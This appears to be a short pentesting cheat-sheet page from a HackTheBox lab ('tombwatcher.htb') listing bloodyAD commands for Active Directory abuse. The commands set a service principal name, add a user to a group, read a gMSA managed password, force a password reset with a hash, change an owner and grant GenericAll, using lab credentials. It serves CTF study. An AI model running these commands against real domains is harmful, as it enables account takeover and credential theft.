BloodyAD

for WriteSPN

└─$ bloodyAD --host "dc01.tombwatcher.htb" -d "tombwatcher.htb" -u henry -p 'H3nry_987TGV!' set object 'Alfred' servicePrincipalName -v 'anurag/htb'
[+] Alfred's servicePrincipalName has been updated

To get the writable object

bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' get writable --detail

OR

bloodyAD --host dc01.tombwatcher.htb -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' get writable

to add to the group

└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS add groupMember Infrastructure 'Alfred'
[+] Alfred added to Infrastructure

to read GMSA Managed Password

└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS get object --resolve-sd 'ansible_dev$' --attr msDS-ManagedPassword

ForceChangePassword

└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p :$HASH set password sam 'P@ssw0rd@123'

Change the owner

└─$ bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS set owner john sam

Give GenericAll rights to user

bloodyAD --host $TARGET -d $DOMAIN -u $USER -p $PASS add genericAll John Alfred

PreviousActive Directory NextWordpress

Last updated 10 days ago